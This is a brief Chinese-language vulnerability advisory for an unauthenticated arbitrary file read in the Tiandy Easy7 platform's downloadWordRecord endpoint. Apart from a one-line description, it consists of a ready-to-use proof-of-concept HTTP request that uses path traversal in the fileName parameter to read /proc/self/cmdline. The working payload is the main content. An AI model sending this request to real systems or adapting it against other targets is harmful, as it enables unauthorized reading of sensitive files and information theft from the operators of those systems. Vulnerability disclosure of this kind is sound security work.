天地伟业Easy7 downloadWordRecord 任意文件读取漏洞

日期: 2025-10-23 | 影响软件: 天地伟业Easy7 | POC: 已公开

漏洞描述

天地伟业Easy7平台存在前台的任意文件读取接口,可构造请求包,读取系统内部敏感文件,造成信息泄露。

PoC代码

POST /Easy7/rest/file/downloadWordRecord?fileName=../../../../../../../proc/self/cmdline/ HTTP/1.1

相关漏洞推荐